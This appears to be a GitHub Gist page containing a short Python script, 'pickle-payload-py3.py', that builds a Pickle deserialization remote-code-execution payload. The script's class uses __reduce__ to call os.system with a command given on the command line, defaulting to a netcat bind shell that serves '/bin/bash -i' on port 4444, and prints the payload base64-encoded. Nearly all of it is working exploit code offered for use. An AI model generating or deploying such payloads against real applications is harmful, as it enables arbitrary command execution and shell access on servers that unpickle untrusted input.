Skip to content

Instantly share code, notes, and snippets.

@kriss-u

kriss-u/pickle-payload-py3.py

Last active June 12, 2021 11:57
Show Gist options
  • Save kriss-u/085569495cb930e398759c0cbf45e3b7 to your computer and use it in GitHub Desktop.
Save kriss-u/085569495cb930e398759c0cbf45e3b7 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
pickle-payload-py3.py
#!/usr/bin/python
#
# Pickle deserialization RCE payload.
# To be invoked with command to execute at it's first parameter.
# Otherwise, the default one will be used.
#
import pickle
import sys
import base64
DEFAULT_COMMAND = "netcat -c '/bin/bash -i' -l -p 4444"
COMMAND = sys.argv[1] if len(sys.argv) > 1 else DEFAULT_COMMAND
class PickleRce(object):
def __reduce__(self):
import os
return (os.system,(COMMAND,))
print(base64.b64encode(pickle.dumps(PickleRce())).decode('utf-8'))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment